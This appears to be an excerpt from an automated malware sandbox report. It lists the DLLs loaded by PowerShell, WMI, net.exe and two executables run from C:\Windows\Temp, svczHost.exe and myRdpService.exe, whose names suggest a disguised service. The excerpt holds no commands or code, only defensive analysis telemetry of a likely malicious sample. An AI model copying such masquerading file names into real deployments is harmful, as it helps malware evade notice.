      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp140.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mlang.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mshtml.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msiso.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: edgegdi.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: apphelp.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: ncrypt.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: ntasn1.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: edgegdi.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: icu.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: winhttp.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: mswsock.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: wshunix.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: dnsapi.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: winrnr.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: nlaapi.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: pnrpnsp.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: napinsp.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: wshbth.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: devobj.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: cryptsp.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: rsaenh.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: cryptbase.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: ntmarta.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: winnsi.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: sspicli.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: schannel.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: mskeyprotect.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: ncryptsslp.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: msasn1.dll
      Source: C:\Windows\Temp\svczHost.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: samlib.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
      Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
      Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
      Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
      Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
      Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
      Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
      Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: apphelp.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: ncrypt.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: version.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: ntasn1.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: edgegdi.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: icu.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: ntmarta.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: cryptsp.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: rsaenh.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: cryptbase.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: winhttp.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: mswsock.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: wshunix.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: dnsapi.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: winrnr.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: nlaapi.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: wshbth.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: devobj.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: pnrpnsp.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: napinsp.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
